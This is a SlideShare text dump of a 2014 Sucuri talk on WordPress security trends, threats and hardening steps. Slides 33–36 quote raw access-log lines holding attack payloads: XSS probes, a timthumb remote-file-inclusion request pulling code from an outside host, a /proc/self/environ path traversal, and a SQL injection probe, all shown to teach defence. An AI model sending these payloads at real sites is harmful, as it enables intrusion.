SlideShare a Scribd company logo
Website Security (WordPress)
 Sucuri, Inc.
 @sucuri_security
 @perezbox
 Specialization:
 Website Security
 Incident Handling
 Special Interests:
 Brazilian JiuJitsu
Tony Perez | @perezbox | @sucuri_security5/17/2014 2
 Website Security Company
 Global Operations
 Platform Agnostic (i.e., Joomla,WordPress, etc..)
 Scan 2M Unique Domains a Month
 Block 4M web attacks a Month
 Remediate 400 – 500 websites a day
 Signature / Heuristic Based
 24/7 operations
5/17/2014 Tony Perez | @perezbox | @sucuri_security 3
 Trends
 Threats
 Defenses
5/17/2014 Tony Perez | @perezbox | @sucuri_security 4
Tony Perez | @perezbox | @sucuri_security5/17/2014 5
5/17/2014 Tony Perez | @perezbox | @sucuri_security 6
Data Breaches (Millions)
2011 2013
Malicious Websites
Legitimate Websites
5/17/2014 Tony Perez | @perezbox | @sucuri_security 7
Not-Exploitable
Exploitable
5/17/2014 Tony Perez | @perezbox | @sucuri_security 8
1 in 8 - CriticalVulnerability
Ransomware
2012 2013
5/17/2014 Tony Perez | @perezbox | @sucuri_security 9
26%
19%
16%
14%
11%
4%
10%
Remote iFrame
Includes
Remote
JavaScript
Includes
SPAM
Injections
Obfuscated /
Encoded
JavaScript
Conditional
Redirects
Defacements Other
5/17/2014 Tony Perez | @perezbox | @sucuri_security 10
5/17/2014 Tony Perez | @perezbox | @sucuri_security 11
5/17/2014 Tony Perez | @perezbox | @sucuri_security 12
5/17/2014 Tony Perez | @perezbox | @sucuri_security 13
Darkleech
Cdork
(Apache)
Ebury
(SSH)
Email
Server
(SPAM)
 Going Deeper than the application layer, targeting the server.
 Server Polymorphism – a.k.a highly adaptive / sophistication
Heartbleed
(OpenSSL)
5/17/2014 Tony Perez | @perezbox | @sucuri_security 14
 Pharmacy
 Payday Loans
5/17/2014 Tony Perez | @perezbox | @sucuri_security 16
5/17/2014 Tony Perez | @perezbox | @sucuri_security 17
 ExploitingAccess Control
5/17/2014 Tony Perez | @perezbox | @sucuri_security 18
Site 1
Site 2Site 3
Site 4
Cross-Site Contamination
5/17/2014 Tony Perez | @perezbox | @sucuri_security 19
5/17/2014 Tony Perez | @perezbox | @sucuri_security 20
5/17/2014 Tony Perez | @perezbox | @sucuri_security 21
5/17/2014 Tony Perez | @perezbox | @sucuri_security 22
5/17/2014 Tony Perez | @perezbox | @sucuri_security 23
5/17/2014 Tony Perez | @perezbox | @sucuri_security 24
5/17/2014 Tony Perez | @perezbox | @sucuri_security 25
5/17/2014 Tony Perez | @perezbox | @sucuri_security 26
 Explosion in the Malware
as a Service (MaaS) trade
 Yes, pay someone to hack
for you
 Different tools to break
in and generate payloads
 Brute force and
vulnerability exploits
Malware Payloads
 Blackhole ExploitAuthor
Arrested
5/17/2014 Tony Perez | @perezbox | @sucuri_security 27
25%
22%
9%
1%
11%
5%
12%
10%
5% Neutrino
Unknown Kit
Redkit
SweetOrange
Styx
Glazunov/Sibhost
Nuclear
Blackhole/Cool
Other
5/17/2014 Tony Perez | @perezbox | @sucuri_security 28
5/17/2014 Tony Perez | @perezbox | @sucuri_security 29
5/17/2014 Tony Perez | @perezbox | @sucuri_security 30
5/17/2014 Tony Perez | @perezbox | @sucuri_security 31
 Use for malware?
 Burrow into network?
 Steal data?
What kind of website do you have?
5/17/2014 Tony Perez | @perezbox | @sucuri_security 32
5/17/2014 Tony Perez | @perezbox | @sucuri_security 33
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0;
Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E
HTTP/1.1" 404 268
 Stored
 Reflective
5/17/2014 Tony Perez | @perezbox | @sucuri_security 34
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php
HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0”
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET
/results/chinchedbistro.com&amp;sa=U&amp;ei=vGBcUYS1IcOaiQLxu4HIBg&amp;ved=0CCYQFjAE&amp;usg=AFQjCNFN1APEnX9-
WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6”
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET
/?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U;
Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
5/17/2014 Tony Perez | @perezbox | @sucuri_security 35
5/17/2014 Tony Perez | @perezbox | @sucuri_security 36
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us)
Firefox/3.5.9”
5/17/2014 Tony Perez | @perezbox | @sucuri_security 37
5/17/2014 Tony Perez | @perezbox | @sucuri_security 38
 http://blog.sucuri.net/2014/03/unmasking-free-premium-
wordpress-plugins.html
5/17/2014 Tony Perez | @perezbox | @sucuri_security 39
- SEOPresser
- Payload located: wp-content/plugins/seo-pressor(gratuit)
- File: central.class.php
- Flat Skins Pack Extension
- Payload located: wp-content/restrict-content-pro/includes/
- File: sidebar.php
- Restrict Content Pro
- Paylaod located: wp-content/ubermenu-skins-flat
 Brand Reputation
 Legal Implications
 Impact to Sales
 Blacklisted by Search
Engines
 Blacklisted by Payment
processors
 Worst Day Of your Life
5/17/2014 Tony Perez | @perezbox | @sucuri_security 40
5/17/2014 Tony Perez | @perezbox | @sucuri_security 41
 Sucuri properties
suffer:
 ~125,000 web based
attacks a month on
average
 ~4,000 attacks a day
▪ This spikes on occasion
 Doesn’t include server
level attacks
 All flavors of attacks
5/17/2014 Tony Perez | @perezbox | @sucuri_security 42
 Principles
 Access Control
 Vulnerabilities
5/17/2014 Tony Perez | @perezbox | @sucuri_security 43
“It’s about risk reduction… risk will never be
zero…”
5/17/2014 Tony Perez | @perezbox | @sucuri_security 44
“…a concept in which multiple layers of security
controls (defenses) are placed throughout an
information technology (IT) system. Its intent is
to provide redundancy in the event a security
control fails or a vulnerability is exploited…”
5/17/2014 Tony Perez | @perezbox | @sucuri_security 45
 Passwords
5/17/2014 Tony Perez | @perezbox | @sucuri_security 46
Complex – Long - Unique
5/17/2014 Tony Perez | @perezbox | @sucuri_security 47
5/17/2014 Tony Perez | @perezbox | @sucuri_security 48
5/17/2014 Tony Perez | @perezbox | @sucuri_security 49
• https://getclef.com/ | @getclef
“requires that in a particular abstraction layer
of a computing environment, every module
(such as a process, a user or a program
depending on the subject) must be able to
access only the information and resources that
are necessary for its legitimate purpose.”
5/17/2014 Tony Perez | @perezbox | @sucuri_security 50
5/17/2014 Tony Perez | @perezbox | @sucuri_security 51
 PHP Execution, disable it:
 /wp-includes
 /wp-content
 /themes
 /plugins
 /uploads
<Files *.php>
Deny from all
</Files>
 WP-CONFIG File Modification
#Disable Plugin /Theme Editor
Define(‘DISALLOW_FILE_EDIT’,true);
5/17/2014 Tony Perez | @perezbox | @sucuri_security 52
5/17/2014 Tony Perez | @perezbox | @sucuri_security 53
• https://www.getcloak.com/ | @getcloak
5/17/2014 Tony Perez | @perezbox | @sucuri_security 54
5/17/2014 Tony Perez | @perezbox | @sucuri_security 55
NOTTHAT HARD!!!!
 Stay current with the latest vulnerabilities:
 Secure - http://wordpress.org/plugins/secure/
5/17/2014 Tony Perez | @perezbox | @sucuri_security 56
 Local Protection
 https://bruteprotect.com/ | @BruteProtect
5/17/2014 Tony Perez | @perezbox | @sucuri_security 57
5/17/2014 Tony Perez | @perezbox | @sucuri_security 58
• Stay ahead of SoftwareVulnerabilities
5/17/2014 Tony Perez | @perezbox | @sucuri_security 59
5/17/2014 Tony Perez | @perezbox | @sucuri_security 60
1. Employ Website Firewall
2. Don’t let WordPress write to
itself
3. Filter Access by IP
4. Use a dedicated server / VPS
5. Monitor all Activity (Logging)
6. Enable SSL for transactions
7. Keep environment current
(patched)
8. No Soup Kitchen Servers
Ideal implementations:
1. Connect Securely – SFTP /
SSH
2. Authentication Keys / wp-
config
3. Use Trusted Sources
4. Use a local Antivirus – MAC
too
5. Permissions - D 755 | F 644
6. Least Privileged Principles
7. Accountability
8. Backups – Include Database
The Bare Minimum:
1. Fix index.php file and assume all is fine.
1. Panic your way into WordPress Forums after hack.
1. Don’t worry about updating.
1. Trust third-party extensions.
1. Apply all upgrades on live site.
1. Install and forget, all is well with your new site.
1. Use the same username and password for everything.
1. Don’t waste time making security adjustments to PHP and settings.
1. No regular backups required.
1. Use the cheapest host.
5/17/2014 Tony Perez | @perezbox | @sucuri_security 61
5/17/2014 Tony Perez | @perezbox | @sucuri_security 62
Name Tool
Sucuri Blog http://blog.sucuri.net
SucuriTV http://sucuri.tv
Malware Scanner http://sitecheck.sucuri.net
Malware Scanner http://unmaskparasites.com
Badware Busters https://badwarebusters.org
Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-
sites
GoogleWebmasterTools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
Secunia SecurityAdvisories http://secunia.com/community/advisories/search/?search=wordpress
Exploit-DB http://www.exploit-
db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
WordPress Hacked FAQ http://codex.wordpress.org/FAQ_My_site_was_hacked
WordPress Hardening http://codex.wordpress.org/Hardening_WordPress
5/17/2014 Tony Perez | @perezbox | @sucuri_security 63
Sucuri, Inc.
Tony Perez
http://sucuri.net
http://blog.sucuri.net
@perezbox | @sucuri_security
Slides:
http://www.slideshare.net/perezbox/website-security-its-
about-the-basics-wordpress-2014

More Related Content

Similar to Website Security - Latest and Greatest (WordPress 2014)

Website Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsWebsite Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the Basics
Tony Perez
 
Joomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The BasicsJoomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The Basics
Tony Perez
 
Website Security - It Begins With Good Posture
Website Security - It Begins With Good PostureWebsite Security - It Begins With Good Posture
Website Security - It Begins With Good Posture
Tony Perez
 
Navigating the Security Landscape
Navigating the Security LandscapeNavigating the Security Landscape
Navigating the Security Landscape
Sucuri
 
WordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityWordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of Security
Tony Perez
 
The Platform Revolution: Making Online Work Happen
The Platform Revolution: Making Online Work HappenThe Platform Revolution: Making Online Work Happen
The Platform Revolution: Making Online Work Happen
Crowdsourcing Week
 
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's Hacks
Tony Perez
 
Attacking (and Defending) Apache Kafka | Kafka Summit London
Attacking (and Defending) Apache Kafka | Kafka Summit LondonAttacking (and Defending) Apache Kafka | Kafka Summit London
Attacking (and Defending) Apache Kafka | Kafka Summit London
HostedbyConfluent
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From Hacks
Tony Perez
 
Hacked - What do you do now?
Hacked - What do you do now?Hacked - What do you do now?
Hacked - What do you do now?
Tony Perez
 

Similar to Website Security - Latest and Greatest (WordPress 2014) (10)

Website Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsWebsite Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the Basics
 
Joomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The BasicsJoomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The Basics
 
Website Security - It Begins With Good Posture
Website Security - It Begins With Good PostureWebsite Security - It Begins With Good Posture
Website Security - It Begins With Good Posture
 
Navigating the Security Landscape
Navigating the Security LandscapeNavigating the Security Landscape
Navigating the Security Landscape
 
WordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityWordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of Security
 
The Platform Revolution: Making Online Work Happen
The Platform Revolution: Making Online Work HappenThe Platform Revolution: Making Online Work Happen
The Platform Revolution: Making Online Work Happen
 
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's Hacks
 
Attacking (and Defending) Apache Kafka | Kafka Summit London
Attacking (and Defending) Apache Kafka | Kafka Summit LondonAttacking (and Defending) Apache Kafka | Kafka Summit London
Attacking (and Defending) Apache Kafka | Kafka Summit London
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From Hacks
 
Hacked - What do you do now?
Hacked - What do you do now?Hacked - What do you do now?
Hacked - What do you do now?
 

More from Tony Perez

A Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersA Practical Security Framework for Website Owners
A Practical Security Framework for Website Owners
Tony Perez
 
2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security
Tony Perez
 
Accounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationAccounting for Website Security in Higher Education
Accounting for Website Security in Higher Education
Tony Perez
 
Building a Security Framework for Websites
Building a Security Framework for WebsitesBuilding a Security Framework for Websites
Building a Security Framework for Websites
Tony Perez
 
Navigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersNavigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website Owners
Tony Perez
 
Business of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceBusiness of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote Workforce
Tony Perez
 
WordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureWordPress Security Begins With Good Posture
WordPress Security Begins With Good Posture
Tony Perez
 
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
Tony Perez
 
WordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionWordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" Version
Tony Perez
 
Word camp orange county 2012 enduser security
Word camp orange county 2012   enduser securityWord camp orange county 2012   enduser security
Word camp orange county 2012 enduser security
Tony Perez
 

More from Tony Perez (10)

A Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersA Practical Security Framework for Website Owners
A Practical Security Framework for Website Owners
 
2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security
 
Accounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationAccounting for Website Security in Higher Education
Accounting for Website Security in Higher Education
 
Building a Security Framework for Websites
Building a Security Framework for WebsitesBuilding a Security Framework for Websites
Building a Security Framework for Websites
 
Navigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersNavigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website Owners
 
Business of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceBusiness of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote Workforce
 
WordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureWordPress Security Begins With Good Posture
WordPress Security Begins With Good Posture
 
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
 
WordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionWordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" Version
 
Word camp orange county 2012 enduser security
Word camp orange county 2012   enduser securityWord camp orange county 2012   enduser security
Word camp orange county 2012 enduser security
 

Recently uploaded

Material Testing Lab Services in Dubai.pdf
Material Testing Lab Services in Dubai.pdfMaterial Testing Lab Services in Dubai.pdf
Material Testing Lab Services in Dubai.pdf
sandeepmetsuae
 
Top 10 Challenges That Every Web Designer Face on A Daily Basis.pptx
Top 10 Challenges That Every Web Designer Face on A Daily Basis.pptxTop 10 Challenges That Every Web Designer Face on A Daily Basis.pptx
Top 10 Challenges That Every Web Designer Face on A Daily Basis.pptx
e-Definers Technology
 
Material Testing Lab Services in Dubai.pptx
Material Testing Lab Services in Dubai.pptxMaterial Testing Lab Services in Dubai.pptx
Material Testing Lab Services in Dubai.pptx
sandeepmetsuae
 
Understanding Love Compatibility or Synastry: Why It Matters
Understanding Love Compatibility or Synastry: Why It MattersUnderstanding Love Compatibility or Synastry: Why It Matters
Understanding Love Compatibility or Synastry: Why It Matters
AstroForYou
 
Exceptional Landscape Architecture Services in Melbourne
Exceptional Landscape Architecture Services in MelbourneExceptional Landscape Architecture Services in Melbourne
Exceptional Landscape Architecture Services in Melbourne
Outdoor Home Decor Company
 
Enhance Your Home with Professional Painting Services
Enhance Your Home with Professional Painting ServicesEnhance Your Home with Professional Painting Services
Enhance Your Home with Professional Painting Services
Perfect Industrial
 
Top Challenges Faced by High-Risk Merchants and How to Overcome Them.pptx
Top Challenges Faced by High-Risk Merchants and How to Overcome Them.pptxTop Challenges Faced by High-Risk Merchants and How to Overcome Them.pptx
Top Challenges Faced by High-Risk Merchants and How to Overcome Them.pptx
Merchantech - Payment Processing Services
 
The best Social Media Spy Apps for Catching Your Unfaithful Wife.pdf
The best Social Media Spy Apps for Catching Your Unfaithful Wife.pdfThe best Social Media Spy Apps for Catching Your Unfaithful Wife.pdf
The best Social Media Spy Apps for Catching Your Unfaithful Wife.pdf
tonytkelly6
 
Biomass Briquettes A Sustainable Solution for Energy and Waste Management..pptx
Biomass Briquettes A Sustainable Solution for Energy and Waste Management..pptxBiomass Briquettes A Sustainable Solution for Energy and Waste Management..pptx
Biomass Briquettes A Sustainable Solution for Energy and Waste Management..pptx
ECOSTAN Biofuel Pvt Ltd
 
Solar powered Security Camera- Sun In One
Solar powered Security Camera- Sun In OneSolar powered Security Camera- Sun In One
Solar powered Security Camera- Sun In One
John McHale
 
Bilal Ibrar - Resume 2024 - Digital Marketing
Bilal Ibrar - Resume 2024 - Digital MarketingBilal Ibrar - Resume 2024 - Digital Marketing
Bilal Ibrar - Resume 2024 - Digital Marketing
Bilal Ibrar
 
Best Web Development Frameworks in 2024
Best Web Development Frameworks in 2024Best Web Development Frameworks in 2024
Best Web Development Frameworks in 2024
growthgrids
 
3 Examples of new capital gains taxes in Canada
3 Examples of new capital gains taxes in Canada3 Examples of new capital gains taxes in Canada
3 Examples of new capital gains taxes in Canada
Lakshay Gandhi
 
Electrical Testing Lab Services in Dubai.pdf
Electrical Testing Lab Services in Dubai.pdfElectrical Testing Lab Services in Dubai.pdf
Electrical Testing Lab Services in Dubai.pdf
sandeepmetsuae
 
How Live-In Care Benefits Chronic Disease Management.pdf
How Live-In Care Benefits Chronic Disease Management.pdfHow Live-In Care Benefits Chronic Disease Management.pdf
How Live-In Care Benefits Chronic Disease Management.pdf
KenWaterhouse
 
Siddhivinayak temple timings Houston, TX
Siddhivinayak temple timings Houston, TXSiddhivinayak temple timings Houston, TX
Siddhivinayak temple timings Houston, TX
gaurisiddhivinayakte
 
How Can I Apply in India (2024) for a US B1/B2 Visa Renewal?
How Can I Apply in India (2024) for a US B1/B2 Visa Renewal?How Can I Apply in India (2024) for a US B1/B2 Visa Renewal?
How Can I Apply in India (2024) for a US B1/B2 Visa Renewal?
usaisofficial
 
Visions of Reality Inspiring Innovations from MIT Reality Hack 2024.
Visions of Reality Inspiring Innovations from MIT Reality Hack 2024.Visions of Reality Inspiring Innovations from MIT Reality Hack 2024.
Visions of Reality Inspiring Innovations from MIT Reality Hack 2024.
betterworlds2012
 
Best Immigration Consultants in Amritsar- SAGA Studies
Best Immigration Consultants in Amritsar- SAGA StudiesBest Immigration Consultants in Amritsar- SAGA Studies
Best Immigration Consultants in Amritsar- SAGA Studies
SAGA Studies
 
How Do Love Spells Really Work? The Secret to Get Your Ex Back Fast, Powerful...
How Do Love Spells Really Work? The Secret to Get Your Ex Back Fast, Powerful...How Do Love Spells Really Work? The Secret to Get Your Ex Back Fast, Powerful...
How Do Love Spells Really Work? The Secret to Get Your Ex Back Fast, Powerful...
Traditional Healer, Love Spells Caster and Money Spells That Work Fast
 

Recently uploaded (20)

Material Testing Lab Services in Dubai.pdf
Material Testing Lab Services in Dubai.pdfMaterial Testing Lab Services in Dubai.pdf
Material Testing Lab Services in Dubai.pdf
 
Top 10 Challenges That Every Web Designer Face on A Daily Basis.pptx
Top 10 Challenges That Every Web Designer Face on A Daily Basis.pptxTop 10 Challenges That Every Web Designer Face on A Daily Basis.pptx
Top 10 Challenges That Every Web Designer Face on A Daily Basis.pptx
 
Material Testing Lab Services in Dubai.pptx
Material Testing Lab Services in Dubai.pptxMaterial Testing Lab Services in Dubai.pptx
Material Testing Lab Services in Dubai.pptx
 
Understanding Love Compatibility or Synastry: Why It Matters
Understanding Love Compatibility or Synastry: Why It MattersUnderstanding Love Compatibility or Synastry: Why It Matters
Understanding Love Compatibility or Synastry: Why It Matters
 
Exceptional Landscape Architecture Services in Melbourne
Exceptional Landscape Architecture Services in MelbourneExceptional Landscape Architecture Services in Melbourne
Exceptional Landscape Architecture Services in Melbourne
 
Enhance Your Home with Professional Painting Services
Enhance Your Home with Professional Painting ServicesEnhance Your Home with Professional Painting Services
Enhance Your Home with Professional Painting Services
 
Top Challenges Faced by High-Risk Merchants and How to Overcome Them.pptx
Top Challenges Faced by High-Risk Merchants and How to Overcome Them.pptxTop Challenges Faced by High-Risk Merchants and How to Overcome Them.pptx
Top Challenges Faced by High-Risk Merchants and How to Overcome Them.pptx
 
The best Social Media Spy Apps for Catching Your Unfaithful Wife.pdf
The best Social Media Spy Apps for Catching Your Unfaithful Wife.pdfThe best Social Media Spy Apps for Catching Your Unfaithful Wife.pdf
The best Social Media Spy Apps for Catching Your Unfaithful Wife.pdf
 
Biomass Briquettes A Sustainable Solution for Energy and Waste Management..pptx
Biomass Briquettes A Sustainable Solution for Energy and Waste Management..pptxBiomass Briquettes A Sustainable Solution for Energy and Waste Management..pptx
Biomass Briquettes A Sustainable Solution for Energy and Waste Management..pptx
 
Solar powered Security Camera- Sun In One
Solar powered Security Camera- Sun In OneSolar powered Security Camera- Sun In One
Solar powered Security Camera- Sun In One
 
Bilal Ibrar - Resume 2024 - Digital Marketing
Bilal Ibrar - Resume 2024 - Digital MarketingBilal Ibrar - Resume 2024 - Digital Marketing
Bilal Ibrar - Resume 2024 - Digital Marketing
 
Best Web Development Frameworks in 2024
Best Web Development Frameworks in 2024Best Web Development Frameworks in 2024
Best Web Development Frameworks in 2024
 
3 Examples of new capital gains taxes in Canada
3 Examples of new capital gains taxes in Canada3 Examples of new capital gains taxes in Canada
3 Examples of new capital gains taxes in Canada
 
Electrical Testing Lab Services in Dubai.pdf
Electrical Testing Lab Services in Dubai.pdfElectrical Testing Lab Services in Dubai.pdf
Electrical Testing Lab Services in Dubai.pdf
 
How Live-In Care Benefits Chronic Disease Management.pdf
How Live-In Care Benefits Chronic Disease Management.pdfHow Live-In Care Benefits Chronic Disease Management.pdf
How Live-In Care Benefits Chronic Disease Management.pdf
 
Siddhivinayak temple timings Houston, TX
Siddhivinayak temple timings Houston, TXSiddhivinayak temple timings Houston, TX
Siddhivinayak temple timings Houston, TX
 
How Can I Apply in India (2024) for a US B1/B2 Visa Renewal?
How Can I Apply in India (2024) for a US B1/B2 Visa Renewal?How Can I Apply in India (2024) for a US B1/B2 Visa Renewal?
How Can I Apply in India (2024) for a US B1/B2 Visa Renewal?
 
Visions of Reality Inspiring Innovations from MIT Reality Hack 2024.
Visions of Reality Inspiring Innovations from MIT Reality Hack 2024.Visions of Reality Inspiring Innovations from MIT Reality Hack 2024.
Visions of Reality Inspiring Innovations from MIT Reality Hack 2024.
 
Best Immigration Consultants in Amritsar- SAGA Studies
Best Immigration Consultants in Amritsar- SAGA StudiesBest Immigration Consultants in Amritsar- SAGA Studies
Best Immigration Consultants in Amritsar- SAGA Studies
 
How Do Love Spells Really Work? The Secret to Get Your Ex Back Fast, Powerful...
How Do Love Spells Really Work? The Secret to Get Your Ex Back Fast, Powerful...How Do Love Spells Really Work? The Secret to Get Your Ex Back Fast, Powerful...
How Do Love Spells Really Work? The Secret to Get Your Ex Back Fast, Powerful...
 

Website Security - Latest and Greatest (WordPress 2014)

  • 2.  Sucuri, Inc.  @sucuri_security  @perezbox  Specialization:  Website Security  Incident Handling  Special Interests:  Brazilian JiuJitsu Tony Perez | @perezbox | @sucuri_security5/17/2014 2
  • 3.  Website Security Company  Global Operations  Platform Agnostic (i.e., Joomla,WordPress, etc..)  Scan 2M Unique Domains a Month  Block 4M web attacks a Month  Remediate 400 – 500 websites a day  Signature / Heuristic Based  24/7 operations 5/17/2014 Tony Perez | @perezbox | @sucuri_security 3
  • 4.  Trends  Threats  Defenses 5/17/2014 Tony Perez | @perezbox | @sucuri_security 4
  • 5. Tony Perez | @perezbox | @sucuri_security5/17/2014 5
  • 6. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 6 Data Breaches (Millions) 2011 2013
  • 7. Malicious Websites Legitimate Websites 5/17/2014 Tony Perez | @perezbox | @sucuri_security 7
  • 8. Not-Exploitable Exploitable 5/17/2014 Tony Perez | @perezbox | @sucuri_security 8 1 in 8 - CriticalVulnerability
  • 9. Ransomware 2012 2013 5/17/2014 Tony Perez | @perezbox | @sucuri_security 9
  • 11. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 11
  • 12. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 12
  • 13. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 13 Darkleech Cdork (Apache) Ebury (SSH) Email Server (SPAM)  Going Deeper than the application layer, targeting the server.  Server Polymorphism – a.k.a highly adaptive / sophistication Heartbleed (OpenSSL)
  • 14. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 14
  • 15.  Pharmacy  Payday Loans 5/17/2014 Tony Perez | @perezbox | @sucuri_security 16
  • 16. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 17  ExploitingAccess Control
  • 17. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 18 Site 1 Site 2Site 3 Site 4 Cross-Site Contamination
  • 18. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 19
  • 19. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 20
  • 20. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 21
  • 21. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 22
  • 22. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 23
  • 23. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 24
  • 24. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 25
  • 25. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 26
  • 26.  Explosion in the Malware as a Service (MaaS) trade  Yes, pay someone to hack for you  Different tools to break in and generate payloads  Brute force and vulnerability exploits Malware Payloads  Blackhole ExploitAuthor Arrested 5/17/2014 Tony Perez | @perezbox | @sucuri_security 27
  • 28. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 29
  • 29. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 30
  • 30. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 31  Use for malware?  Burrow into network?  Steal data? What kind of website do you have?
  • 31. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 32
  • 32. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 33 38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268  Stored  Reflective
  • 33. 5/17/2014 Tony Perez | @perezbox | @sucuri_security 34
